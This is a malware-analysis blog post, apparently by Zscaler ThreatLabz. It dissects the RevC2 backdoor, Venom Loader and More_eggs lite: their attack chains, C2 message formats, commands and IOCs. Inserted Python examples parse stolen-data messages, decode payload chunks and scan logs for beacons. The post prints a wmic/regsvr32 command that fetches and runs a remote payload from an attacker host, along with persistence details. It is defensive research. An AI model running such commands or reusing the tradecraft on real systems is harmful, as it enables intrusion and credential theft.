URL: https://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader
Submission: On December 04 via api from IN — Scanned from DK
Security Research


UNVEILING REVC2 AND VENOM LOADER

MUHAMMED IRFAN V A - Security Researcher II
December 02, 2024 - 12 min read



Threatlabz Research


Contents

 1. Introduction
 2. Key Takeaways
 3. Technical Analysis
 4. Conclusion
 5. Zscaler Coverage
 6. Indicators Of Compromise (IOCs)
 7. MITRE ATT&CK Techniques
 8. Appendix
 9. More blogs




INTRODUCTION

Venom Spider, also known as GOLDEN CHICKENS, is a threat actor known for
offering Malware-as-a-Service (MaaS) tools like VenomLNK, TerraLoader,
TerraStealer, and TerraCryptor. These tools have been utilized by other threat
groups such as FIN6 and Cobalt in the past. Recently, Zscaler ThreatLabz
uncovered two significant campaigns leveraging Venom Spider's MaaS tools between
August and October 2024. During our investigation, we identified two new malware
families, which we named RevC2 and Venom Loader, that were deployed using Venom
Spider MaaS tools.

In this blog, we dissect the attack chain used in these campaigns and provide a
comprehensive analysis of these new malware families. We delve into their core
features, network communication protocols, and commands.




KEY TAKEAWAYS

 * Between August and October 2024, ThreatLabz uncovered campaigns that
   leveraged two new malware families: RevC2 and Venom Loader.
 * These two new malware families were deployed through Venom Spider
   malware-as-a-service (MaaS) tools.
 * RevC2 uses WebSockets to communicate with its command-and-control (C2)
   server. The malware can steal cookies and passwords, proxy network traffic,
   and enable remote code execution (RCE).
 * Venom Loader is a new malware loader that is customized for each victim,
   using the victim’s computer name to encode the payload.




TECHNICAL ANALYSIS

The following sections are a technical analysis of the campaigns. The URLs and
file names used in these campaigns vary with each sample. We analyzed a
representative sample from each campaign.


CAMPAIGN 1: API DOCUMENTATION LURE LEADS TO REVC2

The first campaign, occurring from August to September, uses an API
documentation lure to deliver a malicious payload, RevC2. RevC2 is a backdoor
with capabilities to steal sensitive data.

The figure below illustrates the attack chain that leads to the delivery of
RevC2.

Figure 1: Attack chain of the first campaign delivering RevC2 as the payload. 

FIRST STAGE: VENOMLNK

Although the distribution method is currently unknown, the first stage of the
attack begins with a VenomLNK file. This LNK file contains an obfuscated batch
(BAT) script that, when executed, downloads a PNG image
from hxxp://gdrive[.]rest:8080/api/API.png. The PNG image is an API
documentation lure, as shown in the figure below.

Figure 2: API documentation lure used in the first campaign that leverages
RevC2.

The VenomLNK file executes the following command in the background to register
an ActiveX control, triggering the execution of RevC2: 

wmic process call create "regsvr32 /s /i \\gdrive.rest@8080\api\AdvancedWin.ocx"

SECOND STAGE: REVC2

The second stage features RevC2, named after the Program Database (PDB) path
observed in the binary: 

C:\Users\PC\Desktop\C2New\Rev\x64\Release\Rev.pdb

Upon execution, RevC2 retrieves the command-line and checks whether the first
argument ends with dWin.ocx, matching the suffix of the filename. RevC2 then
retrieves the path of the executable file for the current process and compares
it to regsvr32.exe. The malicious software only executes if both checks pass,
ensuring RevC2 is launched as part of the attack chain and not in analysis
environments such as sandboxes.

RevC2 then retrieves the operating system’s local time and creates a log file in
the format C:\ProgramData\boot_%YYYYMMDDTHHMMSS%.log. The log file stores
internal messages generated by the malware during its execution.

An example of the log created by RevC2 is shown below:

[2024-11-14 17:21:38.530681]: Multipler : 1
[2024-11-14 17:22:01.546498]: Getting Passwords

REVC2 COMMUNICATION PROTOCOL

RevC2 uses WebSockets for C2 communication with the help of a C++
library, websocketpp. The C2 address is hardcoded in the binary. In the sample
we examined, the address was ws://208.85.17[.]52:8082.

All data exchanged between the victim’s machine and the C2 server are JSON
objects. 

 * Victim’s machine to C2 server: This JSON object includes two properties: 
   1. The output being sent.
   2. The command_ID type of the output.

The format of this JSON object is: 

{"%output_name%": "%output_value%","type":"%command_ID%"} 

 * C2 server to victim’s machine: This JSON object includes two properties:
   1. type: Contains a command_ID that tells the malware what actions to
      perform.
   2. command: Contains the command_parameter related to the action to be
      performed. In some cases, the command property is empty.

The format of this JSON object is: 

{"type":"%command_ID%","command":"%command_parameter%"}

The command_ID sent by RevC2 to the C2 server is not always the same as
the command_ID sent by the C2 server to RevC2. In two cases (when executing
shell commands and taking screenshots) the command_ID is different, as shown in
Table 1 and Table 2.

CLIENT REGISTRATION

The first data sent to the server is related to registration. The data is a JSON
object in the format {"name": "%computername%","type":"0005"}.

The figure below shows example network traffic between the victim’s machine and
the C2 server.

Figure 3: Example network traffic between a system infected with RevC2 and the
C2 server.

COMMANDS SUPPORTED

RevC2 registers a function handler, which processes the command_ID
and command_parameter from the C2 server and performs the appropriate actions.
The command_IDs supported by RevC2 are described in the table below.

Action: Steals passwords
command_ID: 000000
command_parameter: Empty
Description: Steals passwords from Chromium browsers. RevC2 starts with writing
an entry to the log file with the message “Getting Passwords”. Then, RevC2
retrieves saved passwords from Chromium browsers and sends them to the C2
server.

Action: Executes shell commands
command_ID: 0001
command_parameter: %command%
Description: Executes shell commands. The command_parameter contains the
command to be executed. A new thread is created to execute the command. The
%command% is combined with cmd /c, and this command-line is used to create a
new process. A pipe is created and the standard output and error of the
process are redirected to this pipe. The output is read from the pipe and sent
to the C2 server.

Action: Takes screenshots
command_ID: 0002
command_parameter: %multiplier%
Description: Takes screenshots of the victim’s system. The command_parameter is
used as the multiplier. The width and height of the desktop’s screen in pixels
are multiplied by this value to configure the resolution of the screenshot. The
activity is added to the log file in the format
[%TimeStamp%]:Multipler : %multiplier%. A screenshot of the victim’s desktop is
taken, base64-encoded, and sent to the C2 server.

Action: Proxies traffic
command_ID: 0003
command_parameter: {"listenerIP": "%ip%", "listenerPort" : "%port%"}
Description: Proxies network data using the SOCKS5 protocol. RevC2 receives the
data to proxy from the C2 server in the command_parameter. There are two
internal command IDs that RevC2 uses:
 * 0x55 - Connects to a target address and proxies data to the proxy server.
 * 0x70 - Sends data from the proxy server to the connected socket (created by
   using the command ID 0x55).

Action: Steals cookies
command_ID: 0009
command_parameter: Empty
Description: Steals cookies from Chromium browsers. RevC2 starts with writing
an entry to the log file with the message “Getting Cookies”. This ID also logs
details related to stealing cookies in the log file. Then, RevC2 retrieves
saved cookies from Chromium browsers and sends them to the C2 server.

Action: Executes a command as a different user
command_ID: 0012
command_parameter: {"username": "%username%","password": "%password%","command": "%commandline%"}
Description: Executes a command as a different user using the credentials
received. The %commandline% can be a file path or a command. RevC2 does not
send the command's output to the C2 server.

Table 1: Description of the commands supported by RevC2.

The data format for each RevC2 command_ID is listed in the table below.

Action: Steals passwords
command_ID: 000000
Data Format:
{"passwords":"Application: %application%
Website: %website%
Login URL: %url%
User name: %username%
Password: %password%
","type":"000000"}

Action: Executes shell commands
command_ID: 0007
Data Format: {"result":"%output_of_command%", "type":"0007"}

Action: Takes screenshots
command_ID: 0006
Data Format: {"image":"%base64encoded_image%", "type":"0006"}

Action: Proxies traffic
command_ID: 0003
Data Format: N/A

Action: Steals cookies
command_ID: 0009
Data Format:
{"cookies":"[
{
"Application":"%application%",
"domain": "%domain%",
"expirationDate": %exp_Date%,
"httpOnly": %http_only%,
"name": "%cookie_name%",
"path": "%path%",
"sameSite": "%samesite%",
"Secure": %secure%,
"url": "%url%",
"value": "%cookie_value%"
}
]", "type": "0009"}

Action: Executes a process as a different user
command_ID: 0012
Data Format: N/A

Table 2: Data format for the command_IDs supported by RevC2.

ThreatLabz created a Python script that emulates a RevC2 server. The script is
available in our GitHub repository. The figure below shows example output of an
emulated RevC2 server.

Figure 4: Python script emulating the RevC2 server.
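A server that receives RevC2 results has to turn the Table 2 messages back into something an analyst can triage. The parser below is an added example written for this post, not code from the Zscaler emulation script or from RevC2 itself: it classifies a message by its "type" field, splits the newline-delimited password blob into records, and unpacks the cookie array that Table 2 shows serialised as a string. The sample payloads are constructed, and the assumption that several password records are concatenated back to back (a new record starting at each "Application:" line) is not stated in the post.

```python
"""Parse RevC2 result messages in the Table 2 formats into structured records.

Added example, not code from the Zscaler post or its server emulation script.
The field layouts follow Table 2; the sample payloads are constructed, and the
back-to-back concatenation of several password records is an assumption.
"""
import json

# "type" values from Table 2 and the action each one carries.
REVC2_TYPES = {
    "000000": "passwords",
    "0007": "shell_result",
    "0006": "screenshot",
    "0009": "cookies",
}

# The five "Key: value" lines that make up one stolen-password record.
PASSWORD_FIELDS = ("Application", "Website", "Login URL", "User name", "Password")


def parse_password_blob(blob: str) -> list:
    """Split the newline-delimited 'passwords' string into one dict per record."""
    records, current = [], {}
    for line in blob.splitlines():
        key, sep, value = line.partition(": ")
        if not sep or key not in PASSWORD_FIELDS:
            continue  # blank line or something that is not one of the fields
        if key == "Application" and current:
            records.append(current)  # assumption: a new record starts at "Application"
            current = {}
        current[key] = value
    if current:
        records.append(current)
    return records


def parse_revc2_message(raw: str) -> dict:
    """Classify one RevC2 message by its 'type' field and normalise its payload."""
    msg = json.loads(raw)
    action = REVC2_TYPES.get(msg.get("type"))
    if action is None:
        raise ValueError("unknown RevC2 type: %r" % msg.get("type"))
    if action == "passwords":
        return {"action": action, "records": parse_password_blob(msg["passwords"])}
    if action == "cookies":
        # Table 2 shows the cookie array serialised as a string inside the JSON.
        cookies = json.loads(msg["cookies"])
        return {
            "action": action,
            "records": cookies,
            "domains": sorted({c["domain"] for c in cookies}),
        }
    if action == "screenshot":
        return {"action": action, "image_b64_len": len(msg["image"])}
    return {"action": action, "output": msg["result"]}


# Constructed sample messages shaped like the Table 2 formats.
SAMPLE_PASSWORDS = (
    '{"passwords":"Application: Chrome\\nWebsite: example.com\\n'
    'Login URL: https://example.com/login\\nUser name: alice\\n'
    'Password: hunter2\\n","type":"000000"}'
)
SAMPLE_COOKIES = json.dumps({
    "cookies": json.dumps([
        {"Application": "Chrome", "domain": "example.com", "expirationDate": 1735689600,
         "httpOnly": True, "name": "sid", "path": "/", "sameSite": "lax",
         "Secure": True, "url": "https://example.com/", "value": "constructed"},
        {"Application": "Chrome", "domain": "login.example.net", "expirationDate": 1735689600,
         "httpOnly": False, "name": "pref", "path": "/", "sameSite": "lax",
         "Secure": False, "url": "https://login.example.net/", "value": "constructed"},
    ]),
    "type": "0009",
})
SAMPLE_SHELL = '{"result":"whoami: constructed output", "type":"0007"}'

if __name__ == "__main__":
    for sample in (SAMPLE_PASSWORDS, SAMPLE_COOKIES, SAMPLE_SHELL):
        print(parse_revc2_message(sample))
```

The "domains" list on the cookie result is the field an incident responder usually wants first: it says which sessions need to be revoked without reading every cookie value.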


CAMPAIGN 2: CRYPTO TRANSACTION LURE LEADS TO VENOM LOADER AND MORE_EGGS LITE
MALWARE 

The second campaign, occurring from September to October, appears to be using a
cryptocurrency transaction lure to deliver Venom Loader. Venom Loader then
loads More_eggs lite, a JavaScript (JS) backdoor providing remote code execution
(RCE) capabilities to the threat actor.

More_eggs is a JS-based backdoor delivered using VenomLNK. We named this variant
“More_eggs lite” because, although it is a JS backdoor delivered via VenomLNK,
the variant only includes the capability to perform remote code execution
(RCE). 

The figure below illustrates the attack chain for the second campaign
delivering More_eggs lite.

Figure 5: Attack chain of the second campaign delivering More_eggs lite as the
payload. 

FIRST STAGE: VENOMLNK

Although the method of distribution is currently unknown, the first stage of the
attack begins with a VenomLNK file. The LNK file contains an obfuscated BAT
script which writes a Visual Basic Script (VBS) script (run_bat.vbs) and a BAT
script (bat2.bat) to the Windows temporary directory. VenomLNK first
executes run_bat.vbs, which is used to execute bat2.bat. The bat2.bat file
downloads an image of a cryptocurrency transaction as a lure and displays the
image to the victim, as shown in the figure below.

Figure 6: Cryptocurrency transaction lure used in the second campaign that
leverages Venom Spider tools.

In the background, the malware downloads base.zip
from hxxp://170.75.168[.]151/%computername%/aaa. 

The BAT file then unzips base.zip, which contains ApplicationFrameHost.exe. From
here, the BAT file executes ApplicationFrameHost.exe which sideloads a malicious
DLL named dxgi.dll, leading to the execution of Venom Loader.

SECOND STAGE: VENOM LOADER

The Venom Loader DLL used in this campaign is custom built for each victim and
is used to load the next stage. As mentioned before, base.zip, which contains
Venom Loader, is downloaded from hxxp://170.75.168[.]151/%computername%/aaa. 

The %computername% value is an environment variable which contains the computer
name of the system. Venom Loader uses %computername% as the hardcoded XOR key to
encode the following stages.

In this instance, Venom Loader is used to load the More_eggs lite
backdoor. More_eggs lite’s content is stored as plain text in Venom Loader. The
content is XOR’ed with the %computername% and base64-encoded. The result is
split into three chunks and written to disk with the file names text1, text2,
and text3.

After this, Venom Loader writes a PowerShell (PS) script
to %APPDATA%\Adobe\merge.ps1, which is used to decode the chunks stored
in text1, text2, and text3, and write it to %LOCALAPPDATA%\Microsoft\hello.js.
Then hello.js is executed using cscript. 

Next, Venom Loader creates a VBS script named run_all.vbs in the %APPDATA%\Adobe
directory. This script is designed to execute commands passed to it as
command-line arguments. Then, run_all.vbs is used to run merge.ps1 leading to
execution of More_eggs lite. Finally, Venom Loader establishes persistence for
the More_eggs lite backdoor by adding merge.ps1 to the autorun registry
key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run under the
name GoogleUpdate.
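When text1, text2 and text3 are recovered from an infected host, an analyst can rebuild hello.js without running merge.ps1. The decoder below is an added example, not Venom Loader's or merge.ps1's own code: it follows the post's description (plaintext XOR'ed with %computername%, base64-encoded, split into three chunks) and also includes the encoding direction so the decoder can be exercised offline. Repeating-key XOR, an even three-way split of the base64 text, and the sample script and computer name are all assumptions.

```python
"""Reassemble and decode the payload Venom Loader splits across text1..text3.

Added example, not Venom Loader's or merge.ps1's own code. It follows the post's
description: the plaintext is XOR'ed with %computername%, base64-encoded, and
split into three chunks. Repeating-key XOR, an even three-way split of the
base64 text, and the sample script and computer name are all assumptions.
"""
import base64
from pathlib import Path


def xor_with_key(data: bytes, key: bytes) -> bytes:
    # Repeating-key XOR (assumed form of "XOR'ed with %computername%"); XOR is
    # its own inverse, so the same call encodes and decodes.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_like_venom_loader(plaintext: bytes, computername: str, parts: int = 3) -> list:
    """Produce the chunk contents so the decoder can be exercised offline."""
    blob = base64.b64encode(xor_with_key(plaintext, computername.encode())).decode()
    size = -(-len(blob) // parts)  # ceiling division: all but the last chunk are full
    return [blob[i * size:(i + 1) * size] for i in range(parts)]


def decode_chunks(chunks: list, computername: str) -> bytes:
    """Mirror of what merge.ps1 does: join the chunks, base64-decode, XOR back."""
    return xor_with_key(base64.b64decode("".join(chunks)), computername.encode())


def recover_from_directory(directory: str, computername: str,
                           names=("text1", "text2", "text3")) -> bytes:
    """Read text1..text3 from a triage copy of the drop directory and decode them."""
    chunks = [Path(directory, name).read_text().strip() for name in names]
    return decode_chunks(chunks, computername)


if __name__ == "__main__":
    host = "DESKTOP-AB12CD"                          # constructed computer name
    script = b"WScript.Echo('constructed sample');"  # stands in for hello.js
    chunks = encode_like_venom_loader(script, host)
    print(chunks)
    print(decode_chunks(chunks, host).decode())
```

Because the key is the victim's computer name, the chunks from one host do not decode with another host's name; the decoder needs the name recorded during triage, which is also why each Venom Loader sample is built per victim.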

THIRD STAGE: MORE_EGGS LITE

More_eggs lite continuously sends HTTP POST requests in an infinite loop
to <c2_address>/api/infos. The POST data is formatted
as name=^%computername%&ret=. The name parameter contains the victim’s computer
name, and the first request has an empty ret. The output of each executed
command is returned in the ret parameter of the next request. The figure
below shows the network traffic between a system infected with More_eggs lite
malware and the C2 server.

Figure 7: Network traffic between a system infected with More_eggs lite and the
C2 server.

The response to the request is JSON data in the format {"command":
%command_encoded%}. The command_encoded value is XOR’ed with %computername%,
written to the Windows temporary directory as a .cmd file, and executed.
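The beacon shape above (POST to /api/infos, body name=^%computername%&ret=, empty ret on the first request and command output afterwards) is specific enough to hunt for in web-proxy logs. The scanner below is an added example, not from the Zscaler post: it parses the POST body, distinguishes the initial beacon from result returns, and records the computer name and C2 host for each hit. The tab-separated log layout, the 203.0.113.7 server address (a documentation range, not the post's IOC) and the host names are constructed.

```python
"""Flag More_eggs lite beacons in web-proxy logs.

Added example, not from the Zscaler post. It matches the beacon shape the post
describes (HTTP POST to /api/infos with body name=^%computername%&ret=). The
tab-separated log layout, the 203.0.113.7 server address (a documentation
range, not the post's IOC) and the host names are constructed.
"""
from urllib.parse import parse_qs, urlsplit

BEACON_PATH = "/api/infos"


def parse_beacon_body(body: str):
    """Return the fields of a More_eggs lite POST body, or None if it does not match."""
    fields = parse_qs(body, keep_blank_values=True)
    if set(fields) != {"name", "ret"} or not fields["name"][0].startswith("^"):
        return None
    ret = fields["ret"][0]
    return {
        "computername": fields["name"][0][1:],  # strip the leading caret
        "ret": ret,
        "initial": ret == "",  # first beacon has an empty ret; later ones carry command output
    }


def find_more_eggs_beacons(lines) -> list:
    """Scan log lines (timestamp, source, method, URL, body; tab-separated) for beacons."""
    hits = []
    for line in lines:
        parts = line.rstrip("\n").split("\t")
        if len(parts) != 5:
            continue
        ts, src, method, url, body = parts
        if method != "POST" or urlsplit(url).path != BEACON_PATH:
            continue
        parsed = parse_beacon_body(body)
        if parsed is None:
            continue
        hits.append({"ts": ts, "src": src, "c2": urlsplit(url).netloc, **parsed})
    return hits


# Constructed log lines: two beacons from one host, plus three lines that must not match.
SAMPLE_LOG = [
    "\t".join(["2024-10-02T10:00:01Z", "10.0.0.5", "POST", "http://203.0.113.7/api/infos",
               "name=^DESKTOP-AB12CD&ret="]),
    "\t".join(["2024-10-02T10:00:02Z", "10.0.0.5", "GET", "http://203.0.113.7/api/infos", ""]),
    "\t".join(["2024-10-02T10:00:07Z", "10.0.0.5", "POST", "http://203.0.113.7/api/infos",
               "name=^DESKTOP-AB12CD&ret=desktop-ab12cd%5Calice"]),
    "\t".join(["2024-10-02T10:01:00Z", "10.0.0.9", "POST", "http://203.0.113.7/api/login",
               "user=a&pass=b"]),
    "\t".join(["2024-10-02T10:01:30Z", "10.0.0.9", "POST", "http://203.0.113.7/api/infos",
               "name=DESKTOP-XY99&ret="]),
]

if __name__ == "__main__":
    for hit in find_more_eggs_beacons(SAMPLE_LOG):
        print(hit)
```

Matching on the body rather than only on the path keeps the rule from firing on unrelated /api/infos endpoints, and the "initial" flag lets a responder order events: the first empty-ret beacon marks when the host came under control, and every later hit with a non-empty ret is command output leaving the network.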




CONCLUSION

ThreatLabz observed numerous campaigns utilizing RevC2 and Venom Loader. We
believe the malware families used in these campaigns are early versions, and
expect more features and anti-analysis techniques to be added in the future.

The Zscaler Cloud Sandbox has consistently detected these campaigns and other
malware attacks with high accuracy. ThreatLabz continues to monitor and track
these new malware families to protect our customers.




ZSCALER COVERAGE 

Zscaler’s multilayered cloud security platform detects indicators related to
RevC2 and Venom Loader at various levels. The figure below depicts the Zscaler
Cloud Sandbox, showing detection details for the campaign delivering Venom
Loader and More_eggs lite.

Figure 8: Zscaler sandbox report for the campaign delivering Venom Loader
and More_eggs lite.

In addition to sandbox detections, Zscaler’s multilayered cloud security
platform detects indicators related to these campaigns at various levels with
the following threat names:

 * LNK.Downloader.VenomLNK
 * Win32.Backdoor.RevC2
 * Win32.Downloader.VenomLoader




INDICATORS OF COMPROMISE (IOCS)

Type   | Indicator                                                        | Description
SHA256 | 9b0b58aa10577244bc0e174d588ffa8d34a54a34c1b59371acba52772b584707 | VenomLNK used in the first campaign.
SHA256 | 46a982ec4ea400f8df403fa8384e1752dca070bd84beef06284f1d412e159e67 | VenomLNK used in the first campaign.
SHA256 | cf45f68219c4a105fffc212895312ca9dc7f4abe37306d2f3b0f098fb6975ec7 | RevC2
SHA256 | 153cd5a005b553927a94cc7759a8909bd1b351407d8d036a1bf5fcf9ee83192e | RevC2
SHA256 | 8e16378a59eb692de2c3a53b8a966525b0d36412bfd79c20b48c2ee546f13d04 | VenomLNK used in the second campaign.
SHA256 | f93134f9b4ee2beb1998d8ea94e3da824e7d71f19dfb3ce566e8e9da65b1d7a2 | Venom Loader
URL    | hxxp://170.75.168[.]151:8080/transaction.pdf.lnk/                | VenomLNK hosting URL.
URL    | ws://208.85.17[.]52:8082                                         | C2 of RevC2.
URL    | ws://nopsec.org:8082/                                            | C2 of RevC2.
URL    | hxxp://65.38.121[.]211/api/infos                                 | C2 of More_eggs lite.





MITRE ATT&CK TECHNIQUES

ID        | Technique Name                            | Description
T1547.001 | Registry Run Keys / Startup Folder        | Venom Loader uses an autorun key for persistence.
T1140     | Deobfuscate/Decode Files or Information   | More_eggs lite’s JS content is XOR’ed and base64-encoded.
T1574.002 | DLL Side-Loading                          | ApplicationFrameHost.exe sideloads dxgi.dll, which leads to the execution of Venom Loader.
T1539     | Steal Web Session Cookie                  | RevC2 steals cookies from browsers.
T1555     | Credentials from Password Stores          | RevC2 steals saved passwords from browsers.
T1113     | Screen Capture                            | RevC2 takes screenshots of the victim’s screen.
T1090     | Proxy                                     | RevC2 has a command which proxies traffic.
T1059     | Command and Scripting Interpreter         | RevC2 and More_eggs lite both have RCE capabilities.
T1571     | Non-Standard Port                         | RevC2 conducts C2 communications through a non-standard port.
T1071.001 | Application Layer Protocol: Web Protocols | RevC2 uses WebSocket for C2 communication. More_eggs lite uses HTTP for C2 communication.
T1041     | Exfiltration Over C2 Channel              | RevC2 and More_eggs lite are capable of exfiltrating stolen information over the C2 channel.





APPENDIX

Visit our GitHub repository to access the Python script that emulates
RevC2's WebSocket server.




